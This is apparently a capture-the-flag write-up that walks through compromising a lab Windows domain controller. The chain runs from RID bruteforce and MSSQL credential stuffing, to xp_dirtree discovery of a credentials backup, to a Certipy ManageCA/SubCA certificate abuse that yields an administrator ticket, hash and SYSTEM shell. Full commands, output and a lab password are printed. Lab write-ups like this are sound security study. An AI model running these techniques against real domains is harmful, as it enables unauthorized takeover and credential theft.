This is a Windows 2019 server machine configured as domain controller running a MSSQL database. Using enabled guest sessions on SMB shared resource, we can bruteforce the RID and get a list of domain users, then bruteforce credentials for the MSSQL database. In the database, the xp_dirtree stored procedure is used to locate a backup of the database which contains credentials for a WinRM shell. Regarding escalation, a misconfiguration on the manage CA permissions can be abused with Certipy-AD to create a new certificate for an administrator user.
KEYWORDS
RID bruteforce, MSSQL directory traversal, xp_dirtree, manageCA, certipy-ad, pass the certificate, pass the ticket.
The SMB share allows guest sessions; however, there are no shared folders available.
USER
Try an RID bruteforce.
Copy domain users found to a file called output and generate a wordlist for users and passwords.
Next, attempt a credential stuffing attack in the MSSQL database using this wordlist.
Attack is successful for credentials operator:operator
Log in with credentials and start enumerating the database.
It seems xp_cmdshell is not enabled and we don't have permissions to activate, therefore this way is closed. We will try to capture the NTLMv2 hash with responder or smbserver.py + xp_dirtree
The captured hash is.
It is not crackable with Hashcat though.
Since we can at least explore the file system with xp_dirtree, let's list the contents of webroot folder.
It seems someone made a backup of the site on July and forgot a copy of the file in the webroot folder. This can be downloaded using a browser or wget
Inside the .zip file we find an .xml with credentials.
We use them to log in with evil-winrm
This shell allows us to collect the user flag.
SYSTEM
First step is to upgrade the shell to a nishang interactive shell.
First step is to grant yourself the Manage Certificates access right by adding your user as a new officer with certipy-ad tool.
The SubCA template can be enabled on the CA with the -enable-template flag. By default, the SubCA template is enabled.
No we request a certificate based on the SubCA template. This request will be denied, but we will save the private key and note down the request ID. Make sure you are running the command from a directory where you have writing rights, otherwise the .key will not be written.
In this case, private key is saved as 21.key. Next, retrieve the issued certificate with the req command and the -retrieve <request ID> flag.
In order for this to work, synchronization with DC clock is needed to avoid clock skew too great. This can be done with ntpdate
Now, using the administrator certificate that we have just created, we generate a Kerberos TGT ticket.
At this point, you can have a full interactive system shell by either passing the administrator hash or passing the TGT ticket.
To pass the hash, you can use psexec or similar tool. To pass the ticket, first export the ticket to prepare the attack.
Then login into the DC passing the TGT ticket.
Final note: for some reason the DC clock gets unskewed very easily, for this reason the commands after the ntpdate have to be issued very quickly to avoid clocks get unsynchronized. Have them typed elsewhere to quickly copy-paste them.
> nmap $target -p53,80,88,135,139,389,445,464,593,636,1433,3268,5985,9389 -sV -sC -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 17:29 EDT
Nmap scan report for manager.htb (10.129.142.151)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-22 04:33:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-22T04:34:12+00:00; +7h03m30s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-20T17:45:32
|_Not valid after: 2053-10-20T17:45:32
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-22T04:34:13+00:00; +7h03m31s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h03m30s, deviation: 1s, median: 7h03m30s
| smb2-time:
| date: 2023-10-22T04:33:32
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 55.72 seconds
> smbmap -H <target ip> -u guest
[+] IP: 10.129.142.151:445 Name: manager.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
> python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py manager.htb/operator:operator@10.129.142.151 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
> SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
> SQL> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
> get-computerinfo
WindowsBuildLabEx : 17763.1.amd64fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsProductName : Windows Server 2019 Standard
WindowsVersion : 1809
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.142.151 -add-officer raven
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
> /usr/bin/certipy-ad req -ca 'manager-DC01-CA' -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate# we can then issue the failed certificate request with the ca command and the -issue-request <request ID> parameter
> /usr/bin/certipy-ad ca -ca 'manager-DC01-CA' -issue-request 21 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
[*] Successfully issued certificate
> /usr/bin/certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 21
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'
> sudo ntpdate -u 10.129.142.151
2023-10-22 16:28:37.84492 (-0400) +25184.364655 +/- 0.061746 10.129.142.151 s1 no-leap
CLOCK: time stepped by 25184.364655
> /usr/bin/certipy-ad auth -pfx ./administrator.pfx -dc-ip 10.129.142.151 -username administrator -domain manager.htb
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
> export KRB5CCNAME=administrator.ccache
> python3 /usr/share/doc/python3-impacket/examples/psexec.py manager.htb/administrator@dc01 -k -no-pass -dc-ip 10.129.142.151 -target-ip 10.129.142.151
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.142.151.....
[*] Found writable share ADMIN$
[*] Uploading file pxXDoAzA.exe
[*] Opening SVCManager on 10.129.142.151.....
[*] Creating service CRFB on 10.129.142.151.....
[*] Starting service CRFB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 566E-8ECA
Directory of c:\Users\Administrator\Desktop
09/28/2023 02:27 PM <DIR> .
09/28/2023 02:27 PM <DIR> ..
10/20/2023 10:46 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 2,414,751,744 bytes free
